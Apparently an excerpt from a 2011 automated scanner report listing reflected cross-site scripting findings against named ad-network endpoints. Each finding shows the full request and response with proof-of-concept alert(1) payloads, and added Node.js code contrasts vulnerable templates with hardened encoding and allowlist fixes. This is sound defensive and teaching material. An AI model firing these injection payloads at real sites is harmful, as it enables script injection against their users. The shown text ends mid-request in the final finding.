GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...
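Findings 1.69 through 1.76 above show two output contexts. In 1.69 untrusted text lands inside a double-quoted HTML attribute (the src="..." of the adtechus iframe tag). In 1.71 through 1.76 it lands inside HTML that is itself a single-quoted JavaScript string handed to document.write() (the mediaplex click tag), so two encoding layers are needed, not one. In 1.69, 1.70, 1.73 and 1.76 it is the name of an arbitrary parameter that is reflected, which tells you the server rebuilds its outgoing URL from every parameter it received instead of from a fixed set (1.70 additionally reflects into a double-quoted JavaScript string in a response with no Content-Type header at all). The following Node.js code is an added example, not code from the scanner report or from any of the ad servers listed. It reproduces the vulnerable template shapes as the report shows them and puts a hardened version beside each. The function names, the allowlist rules for grp, mpt and mpvc, and the assumption that the real backends are built from templates like these are this example's own.

```javascript
// Added example: context-aware encoding for the two reflection contexts seen
// in findings 1.69-1.76 (assumed function names; templates copied from the report).

// Encode a value for insertion into a quoted HTML attribute.
function htmlAttrEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Emit a complete, double-quoted JavaScript string literal. JSON.stringify
// escapes quotes and backslashes; the extra replaces make sure the literal can
// never contain "</script>" or the line terminators U+2028/U+2029.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Keep only the parameters the template actually uses, each checked by its own
// validator. An attacker-chosen parameter name (1.69, 1.70, 1.73, 1.76) can then
// never reach the output, because names are never copied from the request.
function pickParams(query, allowed) {
  const out = {};
  for (const [name, isValid] of Object.entries(allowed)) {
    const v = query[name];
    if (typeof v === 'string' && isValid(v)) out[name] = v;
  }
  return out;
}

const isDigits = v => /^[0-9]{1,12}$/.test(v);
const isHexId = v => /^[0-9a-f]{1,16}$/i.test(v);
// A click-through URL (mpvc) must be an absolute http(s) URL; anything else is dropped.
const isHttpUrl = v => {
  try { const u = new URL(v); return u.protocol === 'http:' || u.protocol === 'https:'; }
  catch (e) { return false; }
};

// Context 1 (1.69): <script src="..."> built from request parameters.
// Vulnerable shape, as reflected in the report: raw concatenation into src="...".
function adIframeVulnerable(grp) {
  return '<script src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;grp=' +
    grp + ';adiframe=y"></script>';
}
// Hardened: validate, URL-encode the path segment, then attribute-encode the URL.
function adIframeHardened(query) {
  const p = pickParams(query, { grp: isHexId });
  if (p.grp === undefined) return '';
  const url = 'http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;grp=' +
    encodeURIComponent(p.grp) + ';adiframe=y';
  return '<script src="' + htmlAttrEncode(url) + '"></script>';
}

// Context 2 (1.71-1.76): document.write('<a href="...">') served as a script.
// Vulnerable shape: mpt and mpvc are concatenated into HTML inside a JS string.
function clickTagVulnerable(mpt, mpvc) {
  return "document.write('<a target=\"_blank\" href=\"" + mpvc +
    "http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=" + mpt + "\">');";
}
// Hardened: validate both parameters, encode for the inner context (HTML
// attribute), then wrap the whole markup as a JS string literal for the outer one.
function clickTagHardened(query) {
  const p = pickParams(query, { mpt: isDigits, mpvc: isHttpUrl });
  if (p.mpt === undefined) return '';
  const href = (p.mpvc || '') +
    'http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=' + encodeURIComponent(p.mpt);
  const html = '<a target="_blank" href="' + htmlAttrEncode(href) + '">';
  return 'document.write(' + jsStringLiteral(html) + ');';
}
```

Note what happens with the 1.72 payload in the hardened click tag: the mpvc value is still a syntactically valid http URL, so it passes the allowlist, but the single quote becomes &#x27; inside the attribute and the whole markup is emitted as a double-quoted JavaScript literal with angle brackets escaped, so there is nothing left for the payload to close.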

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter (labelled &callback above because the request's query string begins with ?&callback=) is copied into the response body as the JSONP callback name, without validation. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is served with Content-Type: application/json and without an X-Content-Type-Options header, so whether a browser executes the injected <script> when this URL is opened directly depends on its MIME-sniffing behaviour; the missing callback-name validation is the defect either way.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the body of the 403 error response (Content-Type: text/plain). The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with 1.77, the body is not served as HTML, so execution depends on the browser sniffing the text/plain body; independently of that, an error message has no reason to echo the rejected key at all.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)
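Findings 1.77 and 1.78 are the two classic JSONP endpoint mistakes: the callback parameter is written to the response body without validation, and a rejected api_key is echoed back inside the error text. The following Node.js code is an added example and not the bizographics implementation. It keeps the endpoint path, the callback value and the api_key from the report and uses a constructed profile record with the fields visible in 1.77. It validates the callback against a dotted-identifier grammar, drops the key from the 403 message, escapes < and > in the JSON so the body can never contain </script>, labels the JSONP body as JavaScript, and sets X-Content-Type-Options: nosniff so that browsers do not sniff a JSON or text/plain body into HTML. Function names and the profiles lookup are assumptions of the example.

```javascript
// Added example: hardened JSONP handling for the /v1/profile.json endpoint
// (assumed function names; callback value and api_key taken from the report).

// A JSONP callback must be a dotted chain of JavaScript identifiers, e.g.
// dj.module.ad.bio.loadBizoData. Quotes, angle brackets, parentheses and
// whitespace are all rejected before the name can reach the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON that is also safe inside a <script> body: < and > become \u003c and
// \u003e, so "</script>" cannot appear, and U+2028/U+2029 cannot end a statement.
function safeJson(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Constructed stand-in for the profile store; the key and the profile fields
// are the ones visible in finding 1.77.
const SAMPLE_PROFILES = {
  r9t72482usanbp6sphprhvun: {
    bizographics: {
      industry: [{ code: 'business_services', name: 'Business Services' }],
      location: { code: 'texas', name: 'USA - Texas' },
    },
    usage: 1,
  },
};

const BASE_HEADERS = {
  // Tells browsers not to sniff a JSON or text/plain body into HTML.
  'X-Content-Type-Options': 'nosniff',
  'Cache-Control': 'no-store',
};

function reply(status, contentType, body) {
  return { status, headers: { ...BASE_HEADERS, 'Content-Type': contentType + '; charset=utf-8' }, body };
}

// Handle GET /v1/profile.json?callback=...&api_key=...; `query` is the parsed
// query string and `profiles` the lookup table (SAMPLE_PROFILES above).
function handleProfile(query, profiles) {
  const key = query.api_key;
  if (typeof key !== 'string' || !/^[a-z0-9]{16,64}$/i.test(key) ||
      !Object.prototype.hasOwnProperty.call(profiles, key)) {
    // Finding 1.78: the rejected key was echoed back verbatim. Do not echo it.
    return reply(403, 'text/plain', 'Unknown API key');
  }
  const json = safeJson(profiles[key]);
  if (query.callback === undefined) return reply(200, 'application/json', json);
  if (!isSafeCallback(query.callback)) {
    // Finding 1.77: the name used to be written straight into the body.
    return reply(400, 'text/plain', 'Invalid callback');
  }
  // JSONP is JavaScript and is labelled as such.
  return reply(200, 'application/javascript', query.callback + '(' + json + ');');
}
```

The allowlist regex is deliberately stricter than what JavaScript would accept as an identifier (no Unicode letters, no bracket access); every legitimate callback seen in this report, including dj.module.ad.bio.loadBizoData, jsonp1297694123476 and fb_sharepro_render, passes it.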

1.79. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the response body (Content-Type: text/xml; the body is a single JavaScript comment line) and, in addition, into the name of the pixel_<id> cookie in the Set-Cookie header. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

1.80. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the errorMessage string of the JSONP response (Content-Type: application/x-javascript). The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
